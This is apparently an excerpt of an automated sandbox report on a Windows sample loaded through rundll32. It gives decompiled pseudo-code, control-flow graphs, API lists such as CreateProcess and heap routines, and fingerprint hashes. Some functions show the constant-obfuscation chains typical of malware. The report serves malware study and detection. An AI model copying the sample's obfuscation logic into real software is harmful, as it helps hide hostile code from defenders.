				_v28 = 0x752e5d;
				_t36 =  &_v28; // 0x752e5d
				_t87 = 0x4e;
				_v28 =  *_t36 * 0x6f;
				_v28 = _v28 ^ 0x32c1ec83;
				_v12 = 0xba9db2;
				_v12 = _v12 * 0x41;
				_v12 = _v12 + 0xfc46;
				_v12 = _v12 | 0x4911db39;
				_v12 = _v12 ^ 0x6f7f0271;
				_v24 = 0x2e0372;
				_v24 = _v24 / _t87;
				_v24 = _v24 ^ 0x000c7ca5;
				_t58 =  &_a8;
				 *_t58 = _a8 - 1;
				if( *_t58 == 0) {
					 *0x2e320c = _a4;
					if(E002CF8FD() != 0) {
						E002C93ED(); // executed
					}
				}
				return 1;
			}
















                                                                                                                                    0x002ce997
                                                                                                                                    0x002ce99d
                                                                                                                                    0x002ce9a4
                                                                                                                                    0x002ce9ab
                                                                                                                                    0x002ce9b2
                                                                                                                                    0x002ce9b9
                                                                                                                                    0x002ce9c0
                                                                                                                                    0x002ce9c7
                                                                                                                                    0x002ce9d3
                                                                                                                                    0x002ce9d8
                                                                                                                                    0x002ce9dd
                                                                                                                                    0x002ce9e1
                                                                                                                                    0x002ce9e8
                                                                                                                                    0x002ce9ef
                                                                                                                                    0x002ce9f6
                                                                                                                                    0x002ce9fd
                                                                                                                                    0x002cea02
                                                                                                                                    0x002cea07
                                                                                                                                    0x002cea0e
                                                                                                                                    0x002cea15
                                                                                                                                    0x002cea19
                                                                                                                                    0x002cea1a
                                                                                                                                    0x002cea1d
                                                                                                                                    0x002cea24
                                                                                                                                    0x002cea2f
                                                                                                                                    0x002cea32
                                                                                                                                    0x002cea39
                                                                                                                                    0x002cea40
                                                                                                                                    0x002cea47
                                                                                                                                    0x002cea53
                                                                                                                                    0x002cea56
                                                                                                                                    0x002cea5d
                                                                                                                                    0x002cea5d
                                                                                                                                    0x002cea60
                                                                                                                                    0x002cea65
                                                                                                                                    0x002cea77
                                                                                                                                    0x002cea88
                                                                                                                                    0x002cea8d
                                                                                                                                    0x002cea77
                                                                                                                                    0x002cea96

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ExitProcess
                                                                                                                                    • String ID: ].u$d,
                                                                                                                                    • API String ID: 621844428-1507873175
                                                                                                                                    • Opcode ID: 78a260d4cdedb163ccfc71875ce4f2cc58c1dceabb7b0ce884a094c2c298ea87
                                                                                                                                    • Instruction ID: 0443f33e0c27a3e4b4757e0a24c315a2f7ad9be6fda99b6eda418a849f79ea4d
                                                                                                                                    • Opcode Fuzzy Hash: 78a260d4cdedb163ccfc71875ce4f2cc58c1dceabb7b0ce884a094c2c298ea87
                                                                                                                                    • Instruction Fuzzy Hash: 8F31F471D0020AEBDB08DFA5DA8A69EBBF1FB54304F208199D510BB254D7B45B95DF80
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 002CAB87 Relevance: 1.4, Strings: 1, Instructions: 154COMMONCrypto
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 288 2cab87-2cad94 call 2d20b9 call 2c4b61 call 2c7f5d 294 2cad99-2cad9e 288->294 295 2caddd 294->295 296 2cada0-2cada2 294->296 297 2caddf-2cade5 295->297 298 2cada4-2cadaa 296->298 299 2cadb0-2caddb call 2d1e67 * 2 296->299 300 2cadab-2cadae 298->300 299->300 300->297
                                                                                                                                    C-Code - Quality: 72%
                                                                                                                                    			E002CAB87(void* __ecx, void* __edx, void* __eflags) {
				void* _t151;
				void* _t163;
				void* _t164;
				signed int _t169;
				signed int _t170;
				signed int _t171;
				intOrPtr _t187;
				intOrPtr _t190;
				intOrPtr* _t193;
				void* _t194;

				_t193 = _t194 - 0x5c;
				_push( *((intOrPtr*)(_t193 + 0x7c)));
				_t187 =  *((intOrPtr*)(_t193 + 0x6c));
				_push( *((intOrPtr*)(_t193 + 0x78)));
				_push(0);
				_push( *((intOrPtr*)(_t193 + 0x70)));
				_push(_t187);
				_push( *((intOrPtr*)(_t193 + 0x68)));
				_push( *((intOrPtr*)(_t193 + 0x64)));
				_push(__ecx);
				E002D20B9(_t151);
				 *(_t193 + 0x18) =  *(_t193 + 0x18) & 0x00000000;
				 *((intOrPtr*)(_t193 + 0xc)) = 0xc7e504;
				 *((intOrPtr*)(_t193 + 0x10)) = 0xaf8af2;
				 *((intOrPtr*)(_t193 + 0x14)) = 0x514a6e;
				 *(_t193 + 0x34) = 0xb35e3d;
				 *(_t193 + 0x34) =  *(_t193 + 0x34) >> 0xc;
				 *(_t193 + 0x34) =  *(_t193 + 0x34) ^ 0x00059917;
				 *(_t193 + 0x1c) = 0xb39a57;
				 *(_t193 + 0x1c) =  *(_t193 + 0x1c) ^ 0xb15fb5d5;
				 *(_t193 + 0x1c) =  *(_t193 + 0x1c) ^ 0xb1e87bcb;
				 *(_t193 + 0x54) = 0x8cfebd;
				 *(_t193 + 0x54) =  *(_t193 + 0x54) ^ 0x2de11ebd;
				 *(_t193 + 0x54) =  *(_t193 + 0x54) >> 7;
				_t169 = 0x1d;
				 *(_t193 + 0x54) =  *(_t193 + 0x54) / _t169;
				 *(_t193 + 0x54) =  *(_t193 + 0x54) ^ 0x0009bd52;
				 *(_t193 + 0x24) = 0xadd23a;
				 *(_t193 + 0x24) =  *(_t193 + 0x24) + 0xffffea89;
				 *(_t193 + 0x24) =  *(_t193 + 0x24) ^ 0x00a2a736;
				 *(_t193 + 0x20) = 0x1d5481;
				 *(_t193 + 0x20) =  *(_t193 + 0x20) | 0x53ff6cee;
				 *(_t193 + 0x20) =  *(_t193 + 0x20) ^ 0x53f584ee;
				 *(_t193 + 0x2c) = 0x3c40b3;
				 *(_t193 + 0x2c) =  *(_t193 + 0x2c) + 0xffffdf55;
				 *(_t193 + 0x2c) =  *(_t193 + 0x2c) ^ 0x0031ac36;
				 *(_t193 + 0x3c) = 0x52e0cb;
				 *(_t193 + 0x3c) =  *(_t193 + 0x3c) ^ 0x44a49456;
				 *(_t193 + 0x3c) =  *(_t193 + 0x3c) ^ 0x44f1a540;
				 *(_t193 + 0x4c) = 0x46a878;
				 *(_t193 + 0x4c) =  *(_t193 + 0x4c) << 0xf;
				 *(_t193 + 0x4c) =  *(_t193 + 0x4c) + 0xffff6c50;
				 *(_t193 + 0x4c) =  *(_t193 + 0x4c) ^ 0x5431f96e;
				 *(_t193 + 0x30) = 0x13da24;
				 *(_t193 + 0x30) =  *(_t193 + 0x30) << 1;
				 *(_t193 + 0x30) =  *(_t193 + 0x30) ^ 0x002ba36f;
				 *(_t193 + 0x44) = 0xdb90c5;
				 *(_t193 + 0x44) =  *(_t193 + 0x44) << 0xf;
				 *(_t193 + 0x44) =  *(_t193 + 0x44) + 0x7bf2;
				 *(_t193 + 0x44) =  *(_t193 + 0x44) ^ 0xc86621d2;
				 *(_t193 + 0x38) = 0xc3d0db;
				 *(_t193 + 0x38) =  *(_t193 + 0x38) << 0xf;
				 *(_t193 + 0x38) =  *(_t193 + 0x38) ^ 0xe86994ab;
				 *(_t193 + 0x58) = 0x1a470a;
				 *(_t193 + 0x58) =  *(_t193 + 0x58) << 1;
				 *(_t193 + 0x58) =  *(_t193 + 0x58) + 0x63a7;
				 *(_t193 + 0x58) =  *(_t193 + 0x58) | 0x340679df;
				 *(_t193 + 0x58) =  *(_t193 + 0x58) ^ 0x343a3883;
				 *(_t193 + 0x40) = 0xc6f633;
				 *(_t193 + 0x40) =  *(_t193 + 0x40) << 3;
				 *(_t193 + 0x40) =  *(_t193 + 0x40) ^ 0x74163c66;
				 *(_t193 + 0x40) =  *(_t193 + 0x40) ^ 0x722ef2ae;
				 *(_t193 + 0x50) = 0xa2e0bb;
				_t170 = 0x56;
				 *(_t193 + 0x50) =  *(_t193 + 0x50) / _t170;
				 *(_t193 + 0x50) =  *(_t193 + 0x50) + 0x1f8a;
				 *(_t193 + 0x50) =  *(_t193 + 0x50) * 0x7f;
				 *(_t193 + 0x50) =  *(_t193 + 0x50) ^ 0x01094e1c;
				 *(_t193 + 0x28) = 0x4b9267;
				_t171 = 0x28;
				_t115 = _t193 - 0x48; // 0x181c8bbc
				_t172 = _t115;
				 *(_t193 + 0x28) =  *(_t193 + 0x28) / _t171;
				 *(_t193 + 0x28) =  *(_t193 + 0x28) ^ 0x00093005;
				 *(_t193 + 0x48) = 0xd50758;
				 *(_t193 + 0x48) =  *(_t193 + 0x48) ^ 0x7d3d0603;
				 *(_t193 + 0x48) =  *(_t193 + 0x48) << 9;
				 *(_t193 + 0x48) =  *(_t193 + 0x48) ^ 0xd00f781a;
				_push( *(_t193 + 0x1c));
				_push( *(_t193 + 0x34));
				_t190 = 0x44;
				E002C4B61(_t115, _t190);
				 *((intOrPtr*)(_t193 - 0x48)) = _t190;
				_t129 = _t193 - 4; // 0x181c8c00
				_t131 = _t193 - 0x48; // 0x181c8bbc
				_t163 = E002C7F5D(_t115, _t172,  *((intOrPtr*)(_t193 + 0x70)), _t172, _t131, _t172, _t172,  *((intOrPtr*)(_t193 + 0x64)),  *(_t193 + 0x24),  *(_t193 + 0x20),  *(_t193 + 0x2c),  *(_t193 + 0x3c),  *(_t193 + 0x4c),  *((intOrPtr*)(_t193 + 0x78)), _t129); // executed
				if(_t163 == 0) {
					_t164 = 0;
				} else {
					if(_t187 == 0) {
						E002D1E67( *(_t193 + 0x30),  *(_t193 + 0x44),  *(_t193 + 0x38),  *(_t193 + 0x58),  *((intOrPtr*)(_t193 - 4)));
						E002D1E67( *(_t193 + 0x40),  *(_t193 + 0x50),  *(_t193 + 0x28),  *(_t193 + 0x48),  *_t193);
					} else {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
					}
					_t164 = 1;
				}
				return _t164;
			}













                                                                                                                                    0x002cab88
                                                                                                                                    0x002cab94
                                                                                                                                    0x002cab97
                                                                                                                                    0x002cab9a
                                                                                                                                    0x002cab9d
                                                                                                                                    0x002cab9f
                                                                                                                                    0x002caba2
                                                                                                                                    0x002caba3
                                                                                                                                    0x002caba6
                                                                                                                                    0x002cabaa
                                                                                                                                    0x002cabab
                                                                                                                                    0x002cabb0
                                                                                                                                    0x002cabb6
                                                                                                                                    0x002cabbd
                                                                                                                                    0x002cabc4
                                                                                                                                    0x002cabcb
                                                                                                                                    0x002cabd2
                                                                                                                                    0x002cabd6
                                                                                                                                    0x002cabdd
                                                                                                                                    0x002cabe4
                                                                                                                                    0x002cabeb
                                                                                                                                    0x002cabf2
                                                                                                                                    0x002cabf9
                                                                                                                                    0x002cac00
                                                                                                                                    0x002cac09
                                                                                                                                    0x002cac0e
                                                                                                                                    0x002cac13
                                                                                                                                    0x002cac1a
                                                                                                                                    0x002cac21
                                                                                                                                    0x002cac28
                                                                                                                                    0x002cac2f
                                                                                                                                    0x002cac36
                                                                                                                                    0x002cac3d
                                                                                                                                    0x002cac44
                                                                                                                                    0x002cac4b
                                                                                                                                    0x002cac52
                                                                                                                                    0x002cac59
                                                                                                                                    0x002cac60
                                                                                                                                    0x002cac67
                                                                                                                                    0x002cac6e
                                                                                                                                    0x002cac75
                                                                                                                                    0x002cac79
                                                                                                                                    0x002cac80
                                                                                                                                    0x002cac87
                                                                                                                                    0x002cac8e
                                                                                                                                    0x002cac91
                                                                                                                                    0x002cac98
                                                                                                                                    0x002cac9f
                                                                                                                                    0x002caca3
                                                                                                                                    0x002cacaa
                                                                                                                                    0x002cacb1
                                                                                                                                    0x002cacb8
                                                                                                                                    0x002cacbc
                                                                                                                                    0x002cacc3
                                                                                                                                    0x002cacca
                                                                                                                                    0x002caccd
                                                                                                                                    0x002cacd4
                                                                                                                                    0x002cacdb
                                                                                                                                    0x002cace2
                                                                                                                                    0x002cace9
                                                                                                                                    0x002caced
                                                                                                                                    0x002cacf4
                                                                                                                                    0x002cacfb
                                                                                                                                    0x002cad05
                                                                                                                                    0x002cad08
                                                                                                                                    0x002cad0b
                                                                                                                                    0x002cad16
                                                                                                                                    0x002cad19
                                                                                                                                    0x002cad20
                                                                                                                                    0x002cad2c
                                                                                                                                    0x002cad31
                                                                                                                                    0x002cad31
                                                                                                                                    0x002cad34
                                                                                                                                    0x002cad37
                                                                                                                                    0x002cad3e
                                                                                                                                    0x002cad45
                                                                                                                                    0x002cad4c
                                                                                                                                    0x002cad50
                                                                                                                                    0x002cad57
                                                                                                                                    0x002cad5a
                                                                                                                                    0x002cad5f
                                                                                                                                    0x002cad62
                                                                                                                                    0x002cad6a
                                                                                                                                    0x002cad6d
                                                                                                                                    0x002cad74
                                                                                                                                    0x002cad94
                                                                                                                                    0x002cad9e
                                                                                                                                    0x002caddd
                                                                                                                                    0x002cada0
                                                                                                                                    0x002cada2
                                                                                                                                    0x002cadbf
                                                                                                                                    0x002cadd3
                                                                                                                                    0x002cada4
                                                                                                                                    0x002cada7
                                                                                                                                    0x002cada8
                                                                                                                                    0x002cada9
                                                                                                                                    0x002cadaa
                                                                                                                                    0x002cadaa
                                                                                                                                    0x002cadad
                                                                                                                                    0x002cadad
                                                                                                                                    0x002cade5

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateProcess
                                                                                                                                    • String ID: nJQ
                                                                                                                                    • API String ID: 963392458-2884827605
                                                                                                                                    • Opcode ID: 085fbfbc5749637a8e2c0a48e3d829b6a396887fdc5499ebf166a1a814a86cbe
                                                                                                                                    • Instruction ID: ab265ebe1fa7588ff233558fbf1bb64ee2926006b431581dec47c7d890a35f85
                                                                                                                                    • Opcode Fuzzy Hash: 085fbfbc5749637a8e2c0a48e3d829b6a396887fdc5499ebf166a1a814a86cbe
                                                                                                                                    • Instruction Fuzzy Hash: 3F71F27241028CEBCF59CFA4C9499CE3BA1FF48358F108219FE1696220D3B6C969DF45
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 10006A90 Relevance: 18.4, APIs: 1, Instructions: 16933COMMONLIBRARYCODE
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 110 10006a90-10006aab call 1002f9a6 113 10006ab7-10012570 110->113 114 10006aad-10006ab2 110->114 116 10012584-1001258b 113->116 115 100125b4-100125b8 114->115 117 10012597-1001259b call 1002fa69 116->117 118 1001258d-10012595 116->118 121 100125a0-100125a9 117->121 118->116 122 100125ab-100125ad 121->122 123 100125af 121->123 122->115 123->115
                                                                                                                                    APIs
                                                                                                                                    • _malloc.LIBCMT ref: 10006A9C
                                                                                                                                      • Part of subcall function 1002F9A6: __FF_MSGBANNER.LIBCMT ref: 1002F9C9
                                                                                                                                      • Part of subcall function 1002F9A6: __NMSG_WRITE.LIBCMT ref: 1002F9D0
                                                                                                                                      • Part of subcall function 1002F9A6: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001), ref: 1002FA1E
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AllocateHeap_malloc
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 501242067-0
                                                                                                                                    • Opcode ID: ab67eba576b62ed2242e6049fa4a9f00a0283ae289beaf397465af8560d1c9fc
                                                                                                                                    • Instruction ID: 7622b3071c216813c8acba396ad13572c3e9674cac4916c3917d4934f1ce5c91
                                                                                                                                    • Opcode Fuzzy Hash: ab67eba576b62ed2242e6049fa4a9f00a0283ae289beaf397465af8560d1c9fc
                                                                                                                                    • Instruction Fuzzy Hash: BF844072D0002ECFCF08DFECCA959EEFBB5FF68204B169259D425BB294C6356A11CA54
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1002083B Relevance: 16.6, APIs: 11, Instructions: 103memoryCOMMONLIBRARYCODE
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    APIs
                                                                                                                                    • EnterCriticalSection.KERNEL32(100575E0,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004), ref: 1002084A
                                                                                                                                    • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 100208A0
                                                                                                                                    • GlobalHandle.KERNEL32(005778E8), ref: 100208A9
                                                                                                                                    • GlobalUnlock.KERNEL32(00000000,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004), ref: 100208B2
                                                                                                                                    • GlobalReAlloc.KERNEL32(00000000,00000000,00002002), ref: 100208C9
                                                                                                                                    • GlobalHandle.KERNEL32(005778E8), ref: 100208DB
                                                                                                                                    • GlobalLock.KERNEL32 ref: 100208E2
                                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004), ref: 100208EC
                                                                                                                                    • GlobalLock.KERNEL32 ref: 100208F8
                                                                                                                                    • _memset.LIBCMT ref: 10020911
                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 1002093D
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 496899490-0
                                                                                                                                    • Opcode ID: 23a5f943a2514d5899e1dc1f035ea6f74369b98ac7016ed06c6f01df95d95d17
                                                                                                                                    • Instruction ID: dc14c853345dee55639cdae2a1fd03b11c2696e398e705256622f09b1856cd91
                                                                                                                                    • Opcode Fuzzy Hash: 23a5f943a2514d5899e1dc1f035ea6f74369b98ac7016ed06c6f01df95d95d17
                                                                                                                                    • Instruction Fuzzy Hash: 08319C75600715AFE324CF24DD88A1AB7EAEB49241B01492AF996C3662EB71F8448B50
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1002FA69 Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMONLIBRARYCODE
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    APIs
                                                                                                                                    • __lock.LIBCMT ref: 1002FA87
                                                                                                                                      • Part of subcall function 10035A99: __mtinitlocknum.LIBCMT ref: 10035AAD
                                                                                                                                      • Part of subcall function 10035A99: __amsg_exit.LIBCMT ref: 10035AB9
                                                                                                                                      • Part of subcall function 10035A99: EnterCriticalSection.KERNEL32(00000001,00000001,?,10035387,0000000D,10050C60,00000008,10035479,00000001,?,?,00000001,?,?,10030C69,00000001), ref: 10035AC1
                                                                                                                                    • ___sbh_find_block.LIBCMT ref: 1002FA92
                                                                                                                                    • ___sbh_free_block.LIBCMT ref: 1002FAA1
                                                                                                                                    • HeapFree.KERNEL32(00000000,?,10050988), ref: 1002FAD1
                                                                                                                                    • GetLastError.KERNEL32(?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001,00000001,?,10035387,0000000D,10050C60), ref: 1002FAE2
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2714421763-0
                                                                                                                                    • Opcode ID: dc462893557a6a2c1efb59ab9fc79b5cbceadcecec0e23dee2ff352f2dee75c2
                                                                                                                                    • Instruction ID: c59143bfe651e608972d8f734a12067a167937505bca417355bd9d82aad263b9
                                                                                                                                    • Opcode Fuzzy Hash: dc462893557a6a2c1efb59ab9fc79b5cbceadcecec0e23dee2ff352f2dee75c2
                                                                                                                                    • Instruction Fuzzy Hash: 3D012BB5904316AEEB11DFB0EC05B9D7BB4EF013D2F50412DF008AE091DB35A840DB92
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 10001B80 Relevance: 3.1, APIs: 2, Instructions: 98COMMONLIBRARYCODE
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 220 10001b80-10001b90 221 10001b92-10001b97 220->221 222 10001b9c-10001ba8 220->222 223 10001c9c-10001c9f 221->223 224 10001c04-10001c66 222->224 225 10001baa-10001bb5 222->225 228 10001c74-10001c91 VirtualProtect 224->228 229 10001c68-10001c71 224->229 226 10001bb7-10001bbe 225->226 227 10001bfa-10001bff 225->227 230 10001bc0-10001bce 226->230 231 10001be2-10001bf4 VirtualFree 226->231 227->223 232 10001c93-10001c95 228->232 233 10001c97 228->233 229->228 230->231 234 10001bd0-10001be0 230->234 231->227 232->223 233->223 234->227 234->231
                                                                                                                                    APIs
                                                                                                                                    • VirtualFree.KERNELBASE(00000000,?,00004000,?,10001E18,00000001,00000000,?,100025E8,?,?,?,?,100025E8,00000000,00000000), ref: 10001BF4
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FreeVirtual
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1263568516-0
                                                                                                                                    • Opcode ID: dd38d51ca3a6b672f32aeaf0fb246c4496e8ccb210392943b19121075d5be09d
                                                                                                                                    • Instruction ID: 749d9464b473a0839557e7d3f54d457581c14e70089049c47b2cfbba366a5d19
                                                                                                                                    • Opcode Fuzzy Hash: dd38d51ca3a6b672f32aeaf0fb246c4496e8ccb210392943b19121075d5be09d
                                                                                                                                    • Instruction Fuzzy Hash: 5841B9746002099FEB48CF58C490FA9B7B2FB88350F14C659E81A9F395D731EE41CB84
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 10036624 Relevance: 3.0, APIs: 2, Instructions: 28memoryCOMMONLIBRARYCODE
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 235 10036624-10036642 HeapCreate 236 10036647-10036654 call 100365c9 235->236 237 10036644-10036646 235->237 240 10036656-10036663 call 10035aca 236->240 241 1003667a-1003667d 236->241 240->241 244 10036665-10036678 HeapDestroy 240->244 244->237
                                                                                                                                    APIs
                                                                                                                                    • HeapCreate.KERNELBASE(00000000,00001000,00000000,10030AEB,00000001,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C), ref: 10036635
                                                                                                                                    • HeapDestroy.KERNEL32(?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 1003666B
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Heap$CreateDestroy
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3296620671-0
                                                                                                                                    • Opcode ID: d3c419273cfe47b5decc93e2e70dd510a49122bb40b3ad2795d27682d43cbdf9
                                                                                                                                    • Instruction ID: 5adf962be877c1470e25a5b203e63be93066c2f5666ac54c72bc9e0dfe65a95a
                                                                                                                                    • Opcode Fuzzy Hash: d3c419273cfe47b5decc93e2e70dd510a49122bb40b3ad2795d27682d43cbdf9
                                                                                                                                    • Instruction Fuzzy Hash: 22E06D706103519EFB139B30CE8A33539F8FB5878BF008869F405C80A0FBA08840AA15
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 100019C0 Relevance: 2.6, APIs: 2, Instructions: 115memoryCOMMONLIBRARYCODE
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
